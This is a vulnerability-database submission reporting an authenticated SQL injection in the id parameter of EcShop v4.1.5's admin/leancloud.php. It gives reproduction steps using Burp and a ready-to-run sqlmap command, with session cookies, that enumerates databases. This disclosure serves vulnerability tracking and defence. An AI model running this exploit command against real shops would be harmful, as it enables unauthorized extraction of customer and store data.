Submit #212433: EcShop v4.1.5 SQL injectioninfo

TitelEcShop v4.1.5 SQL injection
BeschreibungA vulnerability was discovered in Ecshop v4.1.5. After logging in to the system, the parameter id exists in leancloud.php, and the parameter id is not filtered normally, resulting in SQL injection. An attacker can exploit this vulnerability to obtain data. 1、First log in to the backend, then visit the page below and use burp to capture the packet and obtain the corresponding cookie. /ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123 Note: The cookie must be the following key-value pair. If one item is missing, it means that the correct package is not captured or it must be reconfigured. 2、Use sqlmap for injection testing, pay attention to replace the number in --cookie with the actual cookie, and finally obtain the data successfully. sqlmap -u "http://172.16.214.182/ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123" --data "act=resend" -p "id" --skip "act,cookie,user-agent,referer,host" --risk 3 --level 5 --dbms mysql --cookie "loginNum=1; ECS_LastCheckOrder=Thu%2C%2028%20Apr%202022%2013%3A16%3A49%20GMT; PHPSESSID=ebtmgof8q3bto0ai088fsvl4bh; ECS_ID=18d636b4644873c4fdb46cf3c4c2b135a912706e; ECS[visit_times]=1; ECSCP_ID=378bf619d7c9c9df588c937be89e20acd56e0821; Hm_lvt_154183a478f900f0163b2141ac4416a5=1651151808; Hm_lpvt_154183a478f900f0163b2141ac4416a5=1651151808" --dbs --flush-session --batch --random-agent
Quelle⚠️ https://github.com/xhcccan/code/issues/1
Benutzer
 xhccan (UID 52599)
Einreichung24.09.2023 12:14 (vor 3 Jahren)
Moderieren29.09.2023 16:19 (5 days later)
StatusAkzeptiert
VulDB Eintrag240924 [ECshop 4.1.5 /admin/leancloud.php ID SQL Injection]
Punkte20

Do you need the next level of professionalism?

Upgrade your account now!